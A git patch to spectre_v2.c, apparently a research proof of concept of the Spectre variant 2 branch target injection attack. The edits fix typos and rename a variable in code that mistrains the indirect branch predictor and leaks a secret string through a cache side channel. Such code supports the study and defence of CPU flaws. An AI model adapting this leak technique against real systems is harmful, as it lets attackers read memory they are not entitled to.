From 8dbe117cb065cee7cdba925573a38ed518ef439d Mon Sep 17 00:00:00 2001 From: Samuel Aubertin Date: Tue, 5 Apr 2022 12:44:24 +0200 Subject: [PATCH] Typos, change variable name for readability --- spectre_v2.c | 22 ++++++++++++---------- 1 file changed, 12 insertions(+), 10 deletions(-) diff --git a/spectre_v2.c b/spectre_v2.c index e16d9cf..2b5e0fc 100644 --- a/spectre_v2.c +++ b/spectre_v2.c @@ -26,7 +26,7 @@ char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, uint64_t* target; // pointer to indirect call target unsigned int cache_hit_threshold, array1_size = 16; uint8_t unused1[64], unused2[64], array2[256 * 512], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 }; -uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */ +//uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */ uint8_t channel[256 * GAP]; // side channel to extract secret phrase // mistrained target of indirect call @@ -44,15 +44,15 @@ safe_target(char* addr) } // function that makes indirect call -// note that addr will be passed to gadget via %rdi +// note that addr will be passed to gadget via %rdi int -victim_function(char* addr, int input) +victim_function(char* addr, int input) { #pragma GCC diagnostic ignored "-Wuninitialized" unsigned int result, junk = junk; // set up branch history buffer (bhb) by performing >29 taken branches // see https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html - // for details about how the branch prediction mechanism works + // for details about how the branch prediction mechanism works // junk and input used to guarantee the loop is actually run for (int i = 1; i <= 100; i++) { input += i; @@ -61,10 +61,10 @@ victim_function(char* addr, int input) // call *target __asm volatile( "mov %%rax, %2\n" - "callq *%1\n" + "callq *%1\n" "mov %0, %%eax\n" : "=r" (result) - : "r" (*target), "r" (addr) + : "r" (*target), "rm" (addr) : "rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11"); return result & junk; } @@ -87,6 +87,7 @@ leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_thres channel[i * GAP] = 1; } for (tries = 999; tries > 0; tries--) { + // Malicious target *target = (uint64_t)&gadget; #ifndef NOMFENCE _mm_mfence(); @@ -94,7 +95,6 @@ leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_thres for (j = 50; j > 0; j--) { junk ^= victim_function(&dummy, 0); } - #ifndef NOMFENCE _mm_mfence(); #endif @@ -129,7 +129,9 @@ leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_thres #ifndef NOMFENCE _mm_mfence(); #endif - // call victim + // call victim + + //printf("victim with %p\n", target_addr); junk ^= victim_function(target_addr, 0); #ifndef NOMFENCE _mm_mfence(); @@ -165,7 +167,7 @@ main(int argc, char** argv) { int o, score[2], len = (int)strlen(secret), json = 0, successes = 0; uint8_t value[2]; - char* addr = secret; + char* secret_addr = secret; while ((o = getopt(argc, argv, "t:j")) != EOF) { switch (o) { @@ -197,7 +199,7 @@ main(int argc, char** argv) } #endif while (--len >= 0) { - leak(addr++, value, score, cache_hit_threshold); + leak(secret_addr++, value, score, cache_hit_threshold); if(score[0] == 3 && value[0] > 31 && value[0] < 127) { successes++; fprintf(stderr, "\033[32m%c\033[0m", (value[0]));